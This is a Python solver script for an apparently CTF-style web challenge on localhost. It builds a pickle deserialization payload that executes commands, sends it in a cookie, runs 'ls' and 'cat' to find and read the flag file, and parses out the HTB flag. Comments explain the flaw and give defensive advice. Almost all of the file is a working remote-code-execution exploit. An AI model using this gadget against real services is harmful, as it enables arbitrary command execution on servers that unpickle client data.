import requests, pickle, base64
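def pickle_rce(cmd):
    """Return an object whose pickle makes the *loading* side run ``cmd``.

    ``pickle`` serialises an object by recording what ``__reduce__`` returns:
    a callable and its argument tuple. ``pickle.loads`` calls that callable
    when it rebuilds the object. Here the pair is
    ``(subprocess.check_output, (cmd,))``, so whoever unpickles the bytes
    runs ``cmd`` and receives its captured stdout in place of the object.

    This is why ``pickle.loads`` must never be applied to data a client can
    modify. A service that keeps state in a cookie should use a data-only
    format such as JSON and verify an HMAC over it before parsing.

    The listing this came from had lost its indentation; the nesting below
    (class inside function, method inside class) is restored so the block
    is valid Python again.

    Args:
        cmd: argv list handed unchanged to ``subprocess.check_output``.

    Returns:
        A ``PickleRce`` instance. Nothing is executed here or by
        ``pickle.dumps``; the call only happens on ``pickle.loads``.
    """
    class PickleRce:
        def __reduce__(self):
            # Imported locally, as in the original, so the helper does not
            # rely on a module-level import of subprocess.
            import subprocess
            return (subprocess.check_output, (cmd,))

    return PickleRce()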
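def get_flag_name(html):
    """Extract the first ``flag_...`` file name from the response body.

    Takes the text after the first ``"flag_"`` and cuts it at the first
    occurrence of the two-character sequence backslash + ``n`` (``"\\n"``),
    not at a real newline.
    NOTE(review): presumably the page renders the ``repr`` of the bytes
    returned by ``check_output``, where line breaks appear as a literal
    ``\\n`` -- confirm against the target's template.

    Indentation was missing in the original listing and is restored here.

    Args:
        html: response body as text.

    Returns:
        ``"flag_"`` followed by the extracted suffix.

    Raises:
        IndexError: if ``"flag_"`` does not occur in ``html``.
    """
    after_marker = html.split("flag_")[1]
    suffix = after_marker.split("\\n")[0]
    return "flag_" + suffix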
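def get_flag(html):
    """Extract the first ``HTB{...}`` token from the response body.

    Indentation was missing in the original listing and is restored here.

    Args:
        html: response body as text.

    Returns:
        The text from the first ``"HTB{"`` up to and including the next
        ``"}"``. If no ``"}"`` follows, the rest of the body is returned
        with a ``"}"`` appended.

    Raises:
        IndexError: if ``"HTB{"`` does not occur in ``html``.
    """
    after_prefix = html.split("HTB{")[1]
    inner = after_prefix.split("}")[0]
    return "HTB{" + inner + "}"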
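# Solver for a CTF instance on localhost. It shows the impact of a server
# that (presumably) base64-decodes the 'plan_b' cookie, passes it to
# pickle.loads and renders the resulting 'serum' value in the page.
# Defensive takeaways: never unpickle cookie data; store state server-side
# or in a signed, data-only format. A cookie that base64-decodes to a pickle
# header (0x80 followed by a protocol byte) is worth alerting on.
#
# Both requests now carry a timeout: requests waits indefinitely by default,
# so an unresponsive instance would otherwise hang the script.

# Request 1: directory listing, to learn the flag file name.
get_flag_name_cookie = base64.b64encode(
    pickle.dumps({'serum': pickle_rce(["ls"])})
).decode()
flag_name = get_flag_name(
    requests.get(
        'http://localhost:1337/',
        cookies={'plan_b': get_flag_name_cookie},
        timeout=10,
    ).text
)

# Request 2: read that file and pull the HTB{...} token out of the response.
get_flag_cookie = base64.b64encode(
    pickle.dumps({'serum': pickle_rce(["cat", flag_name])})
).decode()
flag = get_flag(
    requests.get(
        'http://localhost:1337/',
        cookies={'plan_b': get_flag_cookie},
        timeout=10,
    ).text
)
print(flag)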